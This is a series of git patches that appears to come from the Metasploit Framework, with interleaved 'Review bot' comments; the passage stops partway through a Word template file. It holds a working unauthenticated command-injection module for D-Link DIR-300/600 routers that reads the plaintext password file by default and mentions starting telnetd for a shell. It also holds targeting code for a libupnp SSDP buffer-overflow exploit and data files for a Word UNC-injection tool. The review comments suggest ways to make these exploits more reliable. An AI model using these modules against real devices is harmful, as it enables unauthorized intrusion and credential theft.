@@ -257,5 +266,71 @@ def cleanup end end + def choose_target + # If the user specified a target, use that one + return self.target unless self.target.name =~ /Automatic/ + + msearch = + "M-SEARCH * HTTP/1.1\r\n" + + "Host:239.255.255.250:1900\r\n" + + "ST:upnp:rootdevice\r\n" + + "Man:\"ssdp:discover\"\r\n" + + "MX:3\r\n\r\n" + + # Fingerprint the service through SSDP + udp_sock.sendto(msearch, rhost, rport, 0) + + res = nil + 1.upto(5) do + res,addr,info = udp_sock.recvfrom(65535, 1.0) + break if res and res =~ /^(Server|Location)/mi + udp_sock.sendto(msearch, rhost, rport, 0) + end + + self.targets.each do |t| + return t if t[:fingerprint] and res =~ t[:fingerprint] + end + + if res and res.to_s.length > 0 + print_status("No target matches this fingerprint") + print_status("") + res.to_s.split("\n").each do |line| + print_status(" #{line.strip}") + end + print_status("") + else + print_status("The system #{rhost} did not reply to our M-SEARCH probe") + end + + fail_with(Exploit::Failure::NoTarget, "No compatible target detected") + end + + # Accessor for our TCP payload stager attr_accessor :service + + # We need an unconnected socket because SSDP replies often come + # from a different sent port than the one we sent to. This also + # breaks the standard UDP mixin. + def configure_socket + self.udp_sock = Rex::Socket::Udp.create({ + 'Context' => { 'Msf' => framework, 'MsfExploit' => self } + }) + add_socket(self.udp_sock) + end + + # + # Required since we aren't using the normal mixins + # + + def rhost + datastore['RHOST'] + end + + def rport + datastore['RPORT'] + end + + # Accessor for our UDP socket + attr_accessor :udp_sock + end From 191eed88bc57bc6587fb7527944c0304a0ff57e6 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 21:50:03 -0600 Subject: [PATCH 256/421] Fix liberal matching expression on target --- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
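Review bot: `choose_target` accepts the first datagram that arrives on the unconnected socket without checking who sent it. `res,addr,info = udp_sock.recvfrom(65535, 1.0)` assigns `addr` and `info`, and neither is read afterwards. The comment on `configure_socket` only says replies may come from a different port, so the sender address can still be required to equal `rhost`. Otherwise a reply from any other device on the network decides which target is used against the host the operator specified. Discarding foreign replies right after the receive would do, for example `res = nil unless addr == rhost`, assuming `addr` is the sender address in the same textual form as `rhost`. Note also that the loop sends the probe again after the fifth receive attempt, when no further read follows.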
diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index 85df37ca44ae..b473cb369160 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -79,7 +79,7 @@ def initialize(info = {}) # This matches any line of the SSDP M-SEARCH response :fingerprint => - /Server:\s*(.*|Linux\/2\.6\.17\.WB_WPCM450\.1\.3) UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/mi + /Server:\s*Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/mi # # SSDP response: From 4c8811bb8a6db6b50499b85a1d9d1f3f9f953297 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 23:24:44 -0600 Subject: [PATCH 257/421] Add a debug target --- .../exploits/multi/upnp/libupnp_ssdp_overflow.rb | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index b473cb369160..da5e53993055 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -89,7 +89,15 @@ def initialize(info = {}) # Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03) + } ], + + [ "Debug Target", { + + # The callback handles all target-specific settings + :callback => :target_debug + } ] + ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 29 2013')) @@ -214,6 +222,11 @@ def target_supermicro_ipmi_131 end + # Generate a buffer that provides a starting point for exploit development + def target_debug + buffer = Rex::Text.pattern_create(2000) + end + def stage_real_payload(cli) print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") cli.put(payload.encoded + "\n") From 5ca0e4538802730c5674f58e329a0a7398f627b4 Mon Sep 17 00:00:00 2001 
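Review bot: `target_debug` in the `@@ -214,6 +222,11 @@` hunk assigns its result to a local, `buffer = Rex::Text.pattern_create(2000)`, that is never read; the method only works because the assignment is its last expression. Write the body as `Rex::Text.pattern_create(2000)`. The length 2000 duplicates the literal used in `target_supermicro_ipmi_131`, so a shared constant would keep the two from drifting apart. It would also help to comment on the "Debug Target" entry that it has no `:fingerprint` and is therefore only reachable by explicit selection.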
From: m-1-k-3 <github@s3cur1ty.de> Date: Mon, 4 Feb 2013 08:44:12 +0100 Subject: [PATCH 258/421] initial commit --- .../http/dlink_dir_300_600_exec_noauth.rb | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb new file mode 100644 index 000000000000..9b24a0fa80f7 --- /dev/null +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb 
@@ -0,0 +1,73 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link DIR-600 rev B / DIR-300 rev B unauthenticated Remote Command Execution in command.php', + 'Description' => %q{ + Some D-Link Routers are vulnerable to OS Command injection. + You do not need credentials to the webinterface because the command.php + is accesseble without authentication. You could read the plaintext password + file. + Hint: To get a remote shell you could start the telnetd without any authentication. + }, + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://www.dlink.de/cs/Satellite?c=Product_C&childpagename=DLinkEurope-DE%2FDLTechProduct&cid=1197381489628&p=1197318958220&packedargs=QuickLinksParentID%3D1197318958220%26locale%3D1195806663795&pagename=DLinkEurope-DE%2FDLWrapper' ], + [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 04 2013')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('CMD', [ true, 'The command to execute', 'cat /var/passwd']) + ], self.class) + end + + def run + uri = '/command.php' + + print_status("Sending remote command: " + datastore['CMD']) + + data_cmd = "cmd=#{datastore['CMD']}; echo end" + + begin + res = send_request_cgi( + { + 'uri' => uri, + 'method' => 'POST', + 'data' => data_cmd, + }) + return :abort if res.nil? + return :abort if (res.headers['Server'].nil? 
or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/) + return :abort if (res.code == 404) + + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return :abort + end + + if res.body.include? "end" + print_status("Exploited successfully") + print_line("Command: #{datastore['CMD']}") + print_line("Output: #{res.body}") + else + print_status("Exploit failed.") + end + end +end From 24de0d2274129dcc6d9e2e1946e507329cbcd25a Mon Sep 17 00:00:00 2001 From: SphaZ <cyberphaz@gmail.com> Date: Mon, 4 Feb 2013 13:37:09 +0100 Subject: [PATCH 259/421] Data files moved. Updated to use Rex::zip and Msf::Exploit::FILEFORMAT --- data/exploits/docx/[Content_Types].xml | 2 + data/exploits/docx/_rels/.rels | 2 + data/exploits/docx/docProps/app.xml | 2 + .../docx/word/_rels/document.xml.rels | 2 + data/exploits/docx/word/document.xml | 2 + data/exploits/docx/word/fontTable.xml | 2 + data/exploits/docx/word/settings.xml | 2 + data/exploits/docx/word/styles.xml | 2 + data/exploits/docx/word/theme/theme1.xml | 2 + data/exploits/docx/word/webSettings.xml | 2 + modules/auxiliary/docx/word_unc_injector.rb | 273 ++++++++---------- 11 files changed, 143 insertions(+), 150 deletions(-) create mode 100644 data/exploits/docx/[Content_Types].xml create mode 100644 data/exploits/docx/_rels/.rels create mode 100644 data/exploits/docx/docProps/app.xml create mode 100644 data/exploits/docx/word/_rels/document.xml.rels create mode 100644 data/exploits/docx/word/document.xml create mode 100644 data/exploits/docx/word/fontTable.xml create mode 100644 data/exploits/docx/word/settings.xml create mode 100644 data/exploits/docx/word/styles.xml create mode 100644 data/exploits/docx/word/theme/theme1.xml create mode 100644 data/exploits/docx/word/webSettings.xml diff --git a/data/exploits/docx/[Content_Types].xml b/data/exploits/docx/[Content_Types].xml new file mode 100644 index 000000000000..39a9cb897f0e --- /dev/null 
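Review bot: The success test in `run`, `res.body.include? "end"`, reports "Exploited successfully" for any response whose body contains the substring `end`. An error page or unrelated HTML satisfies it, so a device that is not affected can be recorded as vulnerable. Check `res.code == 200` first and require the marker at the tail of the body, e.g. `res.body =~ /end\s*\z/`, assuming the device returns only the command output. The three `return :abort` paths before it exit without any message, and the final failure is printed with `print_status`; use `print_error` with `rhost`/`rport` in each case so a negative result is visible to the operator. `'DefaultTarget' => 0` has no `'Targets'` list to refer to in this auxiliary module and can be dropped.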
+++ b/data/exploits/docx/[Content_Types].xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/></Types> \ No newline at end of file diff --git a/data/exploits/docx/_rels/.rels b/data/exploits/docx/_rels/.rels new file mode 100644 index 000000000000..fdd8c4f37126 --- /dev/null +++ b/data/exploits/docx/_rels/.rels 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships> \ No newline at end of file diff --git a/data/exploits/docx/docProps/app.xml b/data/exploits/docx/docProps/app.xml new file mode 100644 index 000000000000..1580fc2d1a14 --- /dev/null +++ b/data/exploits/docx/docProps/app.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>normal.dot</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>3</Characters><Application>Microsoft Office Outlook</Application><DocSecurity>0</DocSecurity><Lines>0</Lines><Paragraphs>0</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>0</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>12.0000</AppVersion></Properties> diff --git a/data/exploits/docx/word/_rels/document.xml.rels b/data/exploits/docx/word/_rels/document.xml.rels new file mode 100644 index 000000000000..0079d06931a7 --- /dev/null +++ b/data/exploits/docx/word/_rels/document.xml.rels 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships> \ No newline at end of file diff --git a/data/exploits/docx/word/document.xml b/data/exploits/docx/word/document.xml new file mode 100644 index 000000000000..81ef41e2f846 --- /dev/null +++ b/data/exploits/docx/word/document.xml 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00E97639" w:rsidRDefault="00E97639"><w:r><w:t> </w:t></w:r></w:p><w:sectPr w:rsidR="00E97639" w:rsidSect="00B25E88"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document> diff --git a/data/exploits/docx/word/fontTable.xml b/data/exploits/docx/word/fontTable.xml new file mode 100644 index 000000000000..20e9a398fef8 --- /dev/null +++ b/data/exploits/docx/word/fontTable.xml 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="20002A87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000004B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font></w:fonts> \ No newline at end of file diff --git a/data/exploits/docx/word/settings.xml b/data/exploits/docx/word/settings.xml new file mode 100644 index 000000000000..4692c237a851 --- /dev/null +++ b/data/exploits/docx/word/settings.xml 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main"><w:zoom w:percent="100"/><w:embedSystemFonts/><w:attachedTemplate r:id="rId1"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:doNotValidateAgainstSchema/><w:doNotDemarcateInvalidXml/><w:compat><w:useNormalStyleForList/><w:doNotUseIndentAsNumberingTabStop/><w:useAltKinsokuLineBreakRules/><w:allowSpaceOfSameStyleInTable/><w:doNotSuppressIndentation/><w:doNotAutofitConstrainedTables/><w:autofitToFirstFixedWidthCell/><w:underlineTabInNumList/><w:displayHangulFixedWidth/><w:splitPgBreakAndParaMark/><w:doNotVertAlignCellWithSp/><w:doNotBreakConstrainedForcedTable/><w:doNotVertAlignInTxbx/><w:useAnsiKerningPairs/><w:cachedColBalance/></w:compat><w:rsids><w:rsidRoot w:val="00B25E88"/><w:rsid w:val="00890656"/><w:rsid w:val="00B25E88"/><w:rsid w:val="00E97639"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="off"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:uiCompat97To2003/><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" 
w:followedHyperlink="followedHyperlink"/><w:doNotIncludeSubdocsInStats/><w:doNotAutoCompressPictures/><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings> \ No newline at end of file diff --git a/data/exploits/docx/word/styles.xml b/data/exploits/docx/word/styles.xml new file mode 100644 index 000000000000..4a084626fc28 --- /dev/null +++ b/data/exploits/docx/word/styles.xml 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:docDefaults><w:rPrDefault><w:rPr><w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/><w:sz w:val="22"/><w:szCs w:val="22"/><w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/></w:rPr></w:rPrDefault><w:pPrDefault/></w:docDefaults><w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267"><w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="toc 1" w:uiPriority="39"/><w:lsdException w:name="toc 2" w:uiPriority="39"/><w:lsdException w:name="toc 3" w:uiPriority="39"/><w:lsdException w:name="toc 4" w:uiPriority="39"/><w:lsdException w:name="toc 5" w:uiPriority="39"/><w:lsdException w:name="toc 6" w:uiPriority="39"/><w:lsdException w:name="toc 7" w:uiPriority="39"/><w:lsdException w:name="toc 8" w:uiPriority="39"/><w:lsdException w:name="toc 9" w:uiPriority="39"/><w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/><w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" 
w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/><w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/><w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/><w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" 
w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Revision" w:unhideWhenUsed="0"/><w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException 
w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException 
w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException 
